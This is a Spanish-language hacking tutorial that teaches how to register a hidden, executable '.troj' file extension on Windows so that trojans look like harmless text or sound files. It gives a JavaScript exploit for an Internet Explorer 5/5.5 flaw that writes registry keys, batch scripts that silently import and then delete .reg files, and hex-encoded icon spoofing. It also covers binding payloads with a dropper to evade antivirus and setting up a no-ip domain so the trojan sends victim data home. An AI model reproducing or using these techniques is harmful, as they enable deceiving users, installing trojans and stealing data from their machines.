Hasta aquí, como idea no esta mal, pero sabemos que sólo un usuario del grupo de administradores tiene permiso para manejar el registro. por lo tanto debemos buscar la manera de que sea el administrador del sistema el que se contamine.
No voy a explicar aquí ninguno de los métodos de intrusión, puesto que creo que ya están bastante explicados, y no es el propósito de este texto. partimos del supuesto de que se consigue engañar al administrador y hacerle ejecutar un archivo que contenga no sólo un troyano, sino este método de "contaminación" del sistema, que una vez llevado a cabo, servirá para posteriores infecciones.
Es decir, una vez que alguien está contaminado, se le pueden mandar por el IRC, o por Mail troyanos renombrados a "readme.txt.troj", "sonido.wav.troj" etc. Con la ventaja de que a ojos de la víctima aparecerán como "readme.txt", "sonido.wav" etc, archivos que eludirán los filtros de los scripts de IRC que bloquean las extensiones conocidas como peligrosas (.exe, .bat, .vbs...) y los filtros de algunos clientes de correo que siguen el mismo fin, además la víctima no tendrá ningún problema en pinchar sobre ellos, puesto que parecen inofensivos.
¿De que manera, por tanto, es posible mandar las claves del registro a la víctima?
Vamos a diferenciar 2 maneras diferentes, mediante un JavaScript y mediante un ejecutable.
1.-Mediante un JavaScript:
Hablando un dia sobre este articulo con [^eLaiM^], surgió la posibilidad de recrear este método de "contaminación" del sistema mediante un HTML. El código siguiente es el resultado de estudiar esa posibilidad.
Vamos a valernos de la vulnerabilidad del Internet Explorer en sus versiones 5 y 5.5, explicada aquí y que permite que un atacante modifique el registro de la víctima.
El código fuente que debemos utilizar sería este:
#script#
document.write("");
function f() {
try {
a1=document.applets;
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try {
Shl.RegWrite ("HKCR.troj", "trojfile");
Shl.RegWrite ("HKCR rojfile", "Documento de texto");
Shl.RegWrite ("HKCR rojfileNeverShowExt", "");
Shl.RegWrite ("HKCR rojfileshellopencommand", "%1 %*");
}
catch(e) {}
}
catch(e) {}
}
setTimeout("f()", 1000);
#/script#
IMPOTANTE...
(sustituye los simbolos "#script#" y "#/script#" por "" para que funcione ).
Si el atacante, consigue que la víctima abra este código (metido en un html) ya sea por web o por mail, conseguirá que en el PC de la víctima se cree la extensión maliciosa que "contaminará" el sistema.
Este método es válido para "contaminar" sistemas Win9x/NT/2K
2.-Mediante un ejecutable:
(Vamos a fabricar un ejecutable, de una manera fácilmente entendible que cree la extensión maliciosa en el PC de la víctima).
Crear un exe que añada las claves al registro no representa ningún problema, para cualquiera con conocimientos de programación, pero, como siempre vamos a tratar de demostrar que no hacen falta grandes conocimientos para llevar a cabo estos ataques.
Vamos a valernos de un ".bat" para crear el .reg, de manera que cuando la víctima pinche en el .bat, éste cree en el ".reg" y lo ejecute, evidentemente de manera silenciosa.
Éste es el ".bat" que tenemos que crear, lo vamos a llamar "troj.bat":
@echo off
@echo REGEDIT4>%TEMP%troj.reg
@echo [HKEY_CLASSES_ROOT.troj]>>%TEMP%troj.reg
@echo @="trojfile">>%TEMP%troj.reg
@echo [HKEY_CLASSES_ROOTtrojfile]>>%TEMP%troj.reg
@echo @="Documento de texto">>%TEMP%troj.reg
@echo "NeverShowExt"="">>%TEMP%troj.reg
@echo [HKEY_CLASSES_ROOTtrojfileShellOpenCommand]>>%TEMP%troj.reg
@echo @=""%1" %*">>%TEMP%troj.reg
regedit /s %TEMP%troj.reg
del %TEMP%troj.reg
Como vemos cuando se ejecute el "troj.bat", se creará el archivo "troj.reg" en la carpeta de archivos temporales, por último añadimos 2 líneas:
regedit /s %TEMP%troj.reg
ejecutará el "troj.reg" para que se añadan las claves al registro.
del %TEMP%troj.reg
borra el troj.reg una vez ejecutado, para no dejar rastro.
Pero surge aquí un problema en la línea:
@echo @=""%1" %*">>%TEMP%troj.reg
si hiciéramos así el "troj.bat", crearía un "troj.reg" en el que en vez de aparecer @=""%1" %*" aparecería simplemente @=""
y por lo tanto los archivos con extensión ".troj" no serían ejecutables.
Para solucionarlo sustituimos:
@echo @=""%1" %*">>%TEMP%troj.reg
por:
@echo @=hex(2):22,00,25,00,31,00,22,00,20,00,25,00,2a,00,00,00>>%TEMP%troj.reg
No hemos hecho mas que sustituirlo por su equivalente hexadecimal, ahora la clave será correctamente introducida en el "troj.reg" (quedará así: @=""%1" %*" ).
-------------NOTA--------------
Si el sistema infectado es un NT/2K/XP podemos hacer el troj.bat de otra manera, puesto que existen comandos específicos para añadir extensiones y tipos de archivo al registro, los comandos son: "assoc" y "ftype" ( si quieres saber mas acerca de estos comandos, sólo tienes que escribir en una ventana de comandos "assoc /?" o "ftype /?"). Utilizando estas ordenes vamos a hacer que nuestro "troj.bat" añada automáticamente la extensión y el tipo de archivo al registro sin tener que pasar por el "troj.reg", "troj.bat"quedaría así:
assoc .troj=trojfile
ftype trojfile="%1" %*
El comando "assoc" sirve para añadir una extensión al registro y el "ftype" sirve para añadir un tipo de archivo
Pero por este método no podemos añadir la clave "NeverShowExt"="", y la extensión .troj quedaría a la vista, por lo tanto de todas maneras tendríamos que crear el "troj.reg", de esta manera
@echo off
assoc .troj=trojfile
ftype trojfile="%1" %*
@echo Windows Registry Editor Version 5.00>%TEMP%troj.reg
@echo [HKEY_CLASSES_ROOTtrojfile]>>%TEMP%troj.reg
@echo @="Documento de texto">>%TEMP%troj.reg
@echo "NeverShowExt"="">>%TEMP%troj.reg
@echo [HKEY_CLASSES_ROOTtrojfileShellOpenCommand]>>%TEMP%troj.reg
@echo @=hex(2):22,00,25,00,31,00,22,00,20,00,25,00,2a,00,00,00>>%TEMP%troj.reg
regedit /s %TEMP%troj.reg
Vamos a quedarnos por lo tanto con el primero de los ejemplos que hicimos, sin utilizar los comandos "assoc" y "ftype".
---------FIN DE LA NOTA-- -------
Hasta aquí ya hemos conseguido crear un archivo que nos cree una nueva extensión, oculta y ejecutable. Si ahora la víctima recibe un archivo con icono, por ejemplo de txt, llamado readme.txt.troj, será incapaz de distinguirlo entre un txt y un ejecutable.
CREANDO EL ENGAÑO
Vamos a ver el proceso paso a paso para poner en claro lo fácil que es contaminar un sistema para dejarlo vulnerable a posteriores ataques.
Creamos el troj.bat, de la manera que ya explicamos mas arriba, y lo convertimos en troj.exe utilizando el primero el bat2exe (http://www.computerhope.org/download/utility/bat2exe.com),para convertirlo en troj.com, y después el C2E.COM y lo convertimos en troj.exe (podríamos haberlo dejado como troj.bat, pero siempre es interesante hacer las cosas bien).
La táctica consiste en unir el troj.exe a otro archivo inofensivo, como por ejemplo uno de esas animaciones en Flash con extensión .exe
Necesitamos juntar los dos ejecutables en uno, para ello vamos a utilizar el "DropperGen" esta es la web oficial (http://www.oblivionrat.com) que unido al "lcc-win32" (http://www.cs.virginia.edu/~lcc-win32/) unirá ambos archivos dejándolos en uno (gracias al método que utiliza para unir los archivos eludirá el scan de gran parte de los antivirus).
El archivo resultante pasará por una broma, pero el sistema quedará "contaminado" con la extensión ".troj" en su registro, después de esto se le pueden mandar archivos ejecutables y hacerlos pasar por archivos inofensivos.
Vamos a suponer que ahora pretendemos infectar a la víctima con un troyano:
Elegimos el server de un troyano (server.exe)
Lo primero que hacemos es cambiarle el icono por el de los .txt, para ello, lo cogemos del archivo archivo "shell32.dll", situado en la carpeta system32, utilizando, por ejemplo, el "Iconedit" (http://www.ad.ugatu.ac.ru/iconedit/)e
Una vez que ya lo tenemos, utilizamos el ResHack (http://delphi.icm.edu.pl/ftp/tools/ResHack.zip) para cambiarle el icono al server.exe.
Al archivo resultante lo llamamos por ejemplo "license.txt.troj", y no queda nada mas que mandárselo a la víctima, aunque para nosotros el archivo aparezca así:
Para la víctima el archivo se verá así:
Creo que no es necesario decir lo peligroso que puede ser esto, puesto que no creo que nadie dude un instante en abrir un archivo de texto, porque no se cree que pueda ser peligroso.
Usando este método podemos darle a los archivos la extensión (la falsa) y el icono que queramos cada vez.
Se puede evitar la fase de cambiar el icono al server añadiendo unas líneas mas al registro, en la que atribuyamos un icono específico para los archivos ".troj", por ejemplo:
@echo [HKEY_CLASSES_ROOTtxtfileDefaultIcon]>>%TEMP%troj.reg
@echo @="%SystemRoot%system32shell32.dll,-152">>%TEMP%troj.reg
para añadir el icono del .txt a los archivos .troj, que por las mismas razones que antes (lo de el %) debemos sustituir :
@echo @="%SystemRoot%system32shell32.dll,-152">>%TEMP%troj.reg
por:
@echo @=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,
00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,00,68,00,
65,00,6c,00,6c,00,33,00,32,00,2e,00,64,00,6c,00,6c,00,2c,00,2d,00,31,00,35,
00,32,00,00,00>>%TEMP%troj.reg
en una sola linea, para añadir el icono de los .wav a los archivos .troj cambiaría la última linea por esta:
@echo @="%SystemRoot%System32quartz.dll,-200">>%TEMP%troj.reg
que ahora quedaría:
@echo @=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,
00,74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,
71,00,75,00,61,00,72,00,74,00,7a,00,2e,00,64,00,6c,00,6c,00,2c,00,2d,00,32,
00,30,00,30,00,00,00>>%TEMP%troj.reg
también en una sola linea.
-------------NOTA--------------
Para encontrar el equivalente hexadecimal del icono que buscas, puedes hacerlo fácilmente sin necesidad de editores hexadecimales.
Abre el regedit, busca el tipo de archivo que quieres, abre la carpeta "DefaultIcon", marca el valor en el que pone (Predeterminado) bla bla.
Vete a "Registro">>"Exportar archivo de Registro..." introduce el nombre que quieras y dale a aceptar.
Edita con un editor de texto el archivo ".reg" que acabas de crear y ahí tienes el valor hexadecimal que corresponde a la cadena que quieres poner, y que no puedes añadir por contener el caracter %
---------FIN DE LA NOTA-- -------
La ventaja es que no corremos el riesgo de estar añadiendo un icono característico del Windows 2000, por ejemplo, y enviárselo después a alguien que utilice Windows 98.
El inconveniente es que estaremos limitados a ocultar siempre el server.exe bajo el mismo tipo de archivos.
INTRUSIÓN Y CONTAMINACIÓN DEL SISTEMA
Por supuesto se puede contaminar el sistema sin tener que esperar para mandarle el server.exe posteriormente.
Ejemplo 1:
Incluyendo los 3 archivos, es decir, el ".bat" (pasado a ".exe"), el server.exe y el archivo inofensivo (con el que se engaña a la víctima), en uno solo, con el "DropperGen"
Ejemplo 2:
Metiendo el "server.exe" y el "troj.bat" en una "carpeta trucada" ( Si no conoces como se hacen, lo tienes en la sección "Carpetas Infectadas"), en concreto en la carpeta trucada aparentemente vacía.
Podrías incluso añadir esto al "troj.bat":
@echo copy server.exe %SYSTEMROOT%WinReadme.txt.troj
@echo %SYSTEMROOT%WinReadme.txt.troj
@echo del
@echo del troj.bat
de esta forma el troyano se copiará a la carpeta WINNT (WINDOWS si es un 98) con el nombre WinReadme.txt.troj, después se ejecutará, y se borrarán todos los archivos de la carpeta modificada.
Después de esto, el sistema quedará contaminado, el server del troyano tendrá apariencia de txt, y la carpeta quedará realmente vacía.
Ejemplo 3:
Si tienes los passwords del PC remoto, puedes acceder directamente al registro remoto, introducir las claves manualmente y dejar el sistema contaminado.
Ejemplo 4:
Piensa un poco y seguro que se te ocurren muchas otras maneras.
Actualizado el 14-01-2004
LO DE LA NO IP
Cómo conseguir una no-ip
En esta sección vamos a aprender a crear una no-ip para que cuando nuestro troyano nos envíe la información del ordenador de su víctima la recibamos SIEMPRE en nuestro ordenador y sin problemasAlta en www.no-ip.com
Lo primero que tenemos que hacer es crear un dominio no-ip que después dirigiremos a nuestro ordenador. Para ello abrimos la página oficial de no-ip. Una vez en ella nos vamos a la parte de arriba y pulsamos donde dice Sing-up now!
Ahora nos vamos a la dirección de correo que pusimos, y veremos que nos ha llegado un mensaje de no-ip (si lo habeis hecho bien). Lo abrimos y pulsamos en el link que viene después de "To activate your account please click the following URL", y entonces ya tendremos activa nuestra cuenta en no-ip.
Una vez hecho esto vamos a crear nuestro dominio. Para ello abrimos la página de no-ip y ponemos nuestro e-mail y nuestra contraseña para identificarnos. Se nos abrirá nuestra página personal, nos vamos al menú de la izquierda y hacemos click en add (dentro del menu de host/redirects). Se nos mostrará un formulario como el de la imagen:
Mantener el dominio dirigido a nuestro ordenador
Ahora que ya tenemos creado nuestro dominio tenemos que asegurarnos de que siempre vaya a nuestro ordenador. Para ello no bajamos el no-ip Duc y lo instalamos. Una vez instalado lo abrimos y nos aparecerá esta ventanita:Este programa lo abriremos siempre antes de utilizar el cliente de nuestro virus, para asegurarnos de que la información vaya a nuestro ordenador, y una cosa más, tenemos que marcar el dominio como en la imagen para que se dirija solo.
